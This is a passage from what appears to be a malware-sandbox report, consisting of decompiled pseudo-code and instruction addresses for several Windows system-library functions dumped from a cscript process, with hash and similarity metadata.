													L054D77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x55a7b08 =  *0x55a7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E054F57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E054FF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L054D77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E054EA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L054D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E054F96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x054c849b
0x054c849b
0x054c849b
0x054c849b
0x054c849d
0x054c84a2
0x054c84a7
0x054c84b1
0x054c84d8
0x00000000
0x054c84b3
0x054c84c4
0x054c84c9
0x054c84cd
0x054c84cf
0x054c84cf
0x054c84d6
0x054c84e6
0x054c84e9
0x054c84ec
0x054c84ef
0x054c84f2
0x054c84f4
0x054c84fc
0x054c8501
0x054c8506
0x054c8509
0x054c86e0
0x054c86e5
0x054c86e8
0x054c86ed
0x054c86f0
0x054c86f2
0x05519afd
0x05519b02
0x054c84da
0x054c84df
0x054c84df
0x054c86fa
0x054c86fd
0x054c86fe
0x054c8701
0x054c8706
0x054c8709
0x054c870b
0x00000000
0x00000000
0x054c8711
0x054c8725
0x054c8727
0x054c872a
0x054c872c
0x05519af0
0x05519af5
0x054c8732
0x054c8732
0x054c8732
0x054c8735
0x054c8737
0x054c8515
0x054c8515
0x054c8518
0x054c851d
0x054c8523
0x054c8527
0x054c852b
0x054c8537
0x054c8539
0x054c853c
0x054c853e
0x054c868c
0x054c8691
0x054c8699
0x054c869b
0x054c8744
0x054c8748
0x054c86a1
0x054c86a1
0x054c86a1
0x054c86a4
0x054c86a8
0x05519bdf
0x05519bdf
0x054c86ae
0x054c86b0
0x00000000
0x054c86b6
0x00000000
0x05519be9
0x054c86b0
0x054c8544
0x054c854a
0x054c854d
0x054c8551
0x054c876e
0x054c8778
0x054c877b
0x054c8780
0x054c8557
0x054c8557
0x054c855d
0x054c855d
0x054c856b
0x054c856e
0x054c8570
0x054c8573
0x054c8576
0x054c8576
0x054c8579
0x054c857b
0x00000000
0x00000000
0x054c8581
0x054c85a0
0x054c85a2
0x054c85a5
0x054c85a7
0x05519b1b
0x05519b1b
0x054c862e
0x054c862e
0x054c8631
0x054c8631
0x054c8634
0x054c8636
0x054c8669
0x054c8669
0x054c866b
0x05519bbf
0x05519bc4
0x05519bc8
0x05519bce
0x05519bce
0x054c8671
0x054c8671
0x054c8674
0x054c8676
0x05519bae
0x05519bae
0x054c8676
0x054c867c
0x054c867e
0x054c8688
0x054c8688
0x00000000
0x054c867e
0x054c8638
0x054c8638
0x054c863b
0x054c863e
0x054c863f
0x054c8642
0x054c8645
0x054c8648
0x054c864d
0x05519b69
0x05519b6e
0x05519b7b
0x05519b81
0x05519b85
0x05519b89
0x05519ba7
0x05519b8b
0x05519b91
0x05519b9a
0x05519b9f
0x05519b9f
0x054c8788
0x054c878d
0x054c8763
0x054c8763
0x054c8766
0x00000000
0x054c8766
0x05519b70
0x00000000
0x05519b70
0x054c8656
0x054c865a
0x054c865c
0x054c8752
0x054c8756
0x00000000
0x00000000
0x054c875e
0x00000000
0x054c875e
0x054c8662
0x054c8662
0x054c8662
0x054c8666
0x00000000
0x054c8666
0x054c85b7
0x054c85b9
0x054c85bc
0x054c85bf
0x054c85cc
0x054c85d1
0x054c85d4
0x054c85db
0x054c85de
0x054c85e0
0x05519b5f
0x00000000
0x05519b5f
0x054c85e6
0x054c85ea
0x054c86c3
0x054c86c5
0x054c86c8
0x054c86ca
0x05519b16
0x00000000
0x05519b16
0x054c86d6
0x054c85f6
0x054c85f6
0x054c85f9
0x054c8602
0x054c8606
0x054c860a
0x054c860b
0x054c860e
0x054c8611
0x00000000
0x054c8611
0x054c85f3
0x00000000
0x054c85f3
0x054c8619
0x054c861e
0x054c861e
0x054c8621
0x054c8622
0x054c8623
0x054c8625
0x054c862c
0x00000000
0x054c873d
0x00000000
0x054c873d
0x054c8737
0x054c850f
0x054c8512
0x00000000
0x054c8512
0x00000000
0x054c84d6

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff792e43aaf6e37e876285270b61e280d90cb9c4d45f14b60667cf3d602c013
Instruction ID: c73679d4d9c42b5ee7b479002ca968436bb65402b6c7318e2422d686c2a362da
Opcode Fuzzy Hash: 2ff792e43aaf6e37e876285270b61e280d90cb9c4d45f14b60667cf3d602c013
Instruction Fuzzy Hash: 9FB149B4F042099BDB55DFA9C994AEEBFB6FF88304F10416EE405AB245E770A846CB50

Uniqueness

Uniqueness Score: -1.00%

Function 054E513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E054E513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x55ad360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E054FD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E054D2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L054D4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E054FF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E054CFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x55ab1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E054FB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x054e5142
0x054e514c
0x054e5150
0x054e5157
0x054e5159
0x054e515e
0x054e5165
0x054e5169
0x054e516c
0x054e5172
0x054e5176
0x054e517a
0x054e517a
0x054e517a
0x054e517f
0x05526d8b
0x05526d8e
0x05526d91
0x05526d95
0x05526d98
0x05526d9c
0x05526da0
0x05526da3
0x05526da7
0x05526e26
0x05526e26
0x05526e2a
0x054e51f9
0x054e51f9
0x054e51fe
0x05526e33
0x05526e33
0x05526e39
0x05526e3d
0x05526e46
0x05526e50
0x00000000
0x00000000
0x05526e52
0x05526e53
0x05526e56
0x05526e5d
0x00000000
0x00000000
0x00000000
0x05526e5f
0x05526e67
0x05526e77
0x05526e7f
0x05526e80
0x05526e88
0x05526e90
0x05526e9f
0x05526ea5
0x05526ea9
0x05526eb1
0x05526ebf
0x00000000
0x00000000
0x05526ecf
0x05526ed3
0x00000000
0x00000000
0x05526edb
0x05526ede
0x05526ee1
0x05526ee8
0x05526eeb
0x05526eed
0x05526ef0
0x05526ef4
0x05526ef8
0x05526efc
0x00000000
0x00000000
0x05526f0d
0x05526f11
0x05526f32
0x05526f37
0x05526f3b
0x05526f3e
0x05526f41
0x05526f46
0x00000000
0x00000000
0x05526f4c
0x05526f50
0x05526f50
0x05526f54
0x05526f62
0x05526f65
0x05526f6d
0x05526f7b
0x05526f7b
0x05526f93
0x05526f98
0x05526fa0
0x05526fa6
0x05526fb3
0x05526fb6
0x05526fbf
0x05526fc1
0x05526fd5
0x05526fda
0x05526fda
0x05526fdd
0x05526fe2
0x05526fe7
0x05526feb
0x05526fef
0x05526ff3
0x054e520c
0x054e520c
0x054e520f
0x054e5215
0x054e5234
0x054e523a
0x054e523a
0x054e5244
0x054e5245
0x054e5246
0x054e5251
0x054e5251
0x05526f13
0x05526f17
0x05526f17
0x05526f18
0x05526f1b
0x05526f1f
0x05526f23
0x00000000
0x05526f28
0x054e5204
0x054e5204
0x054e5208
0x00000000
0x054e5208
0x054e5185
0x054e5188
0x054e518a
0x054e518e
0x054e5195
0x05526db1
0x05526db5
0x05526db9
0x054e519b
0x054e519b
0x054e519e
0x054e51a7
0x054e51a9
0x054e51a9
0x054e51b5
0x054e51b8
0x054e51bb
0x054e51be
0x054e51c1
0x054e51c5
0x054e51c9
0x054e51cd
0x054e51cd
0x054e51d8
0x054e51dc
0x054e51e0
0x05526dcc
0x05526dd0
0x05526dd5
0x05526ddd
0x05526de1
0x05526de1
0x05526de5
0x05526deb
0x05526df1
0x05526df7
0x05526dfd
0x05526e01
0x05526e05
0x05526e09
0x05526e0d
0x05526e11
0x05526e11
0x054e51eb
0x05526e1a
0x05526e1f
0x05526e21
0x05526e23
0x00000000
0x054e51f1
0x054e51f1
0x00000000
0x054e51f1

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5afaea6e9d609fdfacd71d0313eeb16a242343498f9eaa6939219851c42942d3
Instruction ID: 7d8603b278c4047f55b1052195f273f0cd00c6c87d912d07619bc5c1044492b1
Opcode Fuzzy Hash: 5afaea6e9d609fdfacd71d0313eeb16a242343498f9eaa6939219851c42942d3
Instruction Fuzzy Hash: F1C113756083809FD354CF28C580AAAFBF1BF89308F14496EF9998B392D771E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 054E03E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E054E03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x55ad360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E054E0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E054FB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E054CB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x55a7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E054D7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E054D7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E05537016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E054F9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E055369A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x55a7c04 != 0) {
						_t118 = _v12;
						_t120 = E0553A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x55a7bd8;
						if( *0x55a7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E054F95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E054F99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E05533540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E054BB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E054FAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x55a8474 - 3;
										if( *0x55a8474 != 3) {
											 *0x55a79dc =  *0x55a79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E054D7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E054D7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E05537016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x55a8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x55a7b00; // 0x0
							asm("ror esi, cl");
							 *0x55ab1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E054F95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E054C7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x054e03f1
0x054e03f7
0x054e03f9
0x054e03fb
0x054e03fd
0x054e0400
0x054e040a
0x05524c7a
0x054e0537
0x054e0547
0x054e0410
0x054e0410
0x054e0414
0x054e0417
0x054e041a
0x054e0421
0x054e0424
0x054e042b
0x054e043b
0x054e043e
0x054e043f
0x054e043f
0x054e0446
0x054e0449
0x054e044c
0x054e044f
0x054e0459
0x05524c8d
0x054e045f
0x054e045f
0x054e045f
0x054e0467
0x05524c97
0x05524c9d
0x05524ca4
0x05524caa
0x05524caf
0x05524cb1
0x05524cc3
0x05524cb3
0x05524cbc
0x05524cbc
0x05524cc8
0x05524ccb
0x05524cd7
0x05524cda
0x05524cdf
0x05524cdf
0x05524ccb
0x05524ca4
0x054e046d
0x054e046f
0x054e046f
0x054e0471
0x054e0476
0x054e047a
0x054e047b
0x054e0483
0x054e0489
0x054e048d
0x00000000
0x00000000
0x05524ce9
0x05524cef
0x05524d22
0x05524d22
0x00000000
0x05524d22
0x05524cf1
0x05524cf7
0x00000000
0x00000000
0x05524cf9
0x05524cff
0x00000000
0x00000000
0x05524d05
0x05524d07
0x00000000
0x00000000
0x05524d0d
0x05524d0f
0x05524d14
0x05524d16
0x00000000
0x00000000
0x05524d1c
0x05524d1c
0x054e0499
0x054e0535
0x054e0535
0x00000000
0x054e0535
0x054e04a6
0x05524d2c
0x05524d37
0x05524d39
0x05524d3b
0x00000000
0x00000000
0x05524d41
0x05524d48
0x054e0527
0x054e052b
0x054e052d
0x054e0530
0x054e0530
0x00000000
0x054e052b
0x05524d4e
0x054e04ac
0x054e04ac
0x054e04af
0x054e04b2
0x054e04b7
0x054e04b9
0x054e04bb
0x054e04bd
0x054e04bf
0x054e04c5
0x054e04c9
0x05524d53
0x05524d59
0x05524db9
0x05524dba
0x05524dbf
0x05524dc2
0x05524dc4
0x05524dc7
0x05524dce
0x00000000
0x05524dce
0x05524d5b
0x05524d61
0x00000000
0x00000000
0x05524d63
0x05524d69
0x00000000
0x00000000
0x05524d6b
0x05524d6e
0x05524d74
0x05524d76
0x05524d7c
0x05524d7e
0x05524d84
0x05524d89
0x05524d8c
0x05524d8d
0x05524d92
0x05524d95
0x05524d96
0x05524d98
0x05524d9a
0x05524d9f
0x05524da4
0x05524da6
0x05524da8
0x05524daf
0x05524db1
0x05524db1
0x05524daf
0x05524da6
0x05524d84
0x05524d7c
0x00000000
0x05524d74
0x054e04d6
0x05524de1
0x054e04dc
0x054e04dc
0x054e04dc
0x054e04e4
0x05524deb
0x05524df1
0x05524df8
0x05524dfe
0x05524e03
0x05524e05
0x05524e17
0x05524e07
0x05524e10
0x05524e10
0x05524e1c
0x05524e1f
0x05524e35
0x05524e35
0x05524e1f
0x05524df8
0x054e04f1
0x054e04fa
0x05524e3f
0x05524e47
0x05524e5b
0x05524e61
0x05524e67
0x05524e69
0x05524e71
0x05524e73
0x054e0500
0x054e0500
0x054e0500
0x054e04fa
0x054e0508
0x054e051d
0x054e051d
0x054e051f
0x054e0524
0x00000000
0x054e0524
0x054e0515
0x054e0517
0x05524e7a
0x05524e7c
0x00000000
0x00000000
0x05524e85
0x00000000
0x05524e85
0x00000000
0x054e0517

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f411e34b528647c63a1f08b5a55e9a2068bed15fc6ade66a548b04c1111a548
Instruction ID: e8f3773a052e6ea8b757a16128d4b3a169349ac1488c3dc91799b0874692a66d
Opcode Fuzzy Hash: 1f411e34b528647c63a1f08b5a55e9a2068bed15fc6ade66a548b04c1111a548
Instruction Fuzzy Hash: 91910531E04224DBEF21DA68C84CBFE7BA5FB06724F050266E925AB2D0DBB49D01C791

Uniqueness

Uniqueness Score: -1.00%

Function 054BC600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E054BC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x55ad360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E054C6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
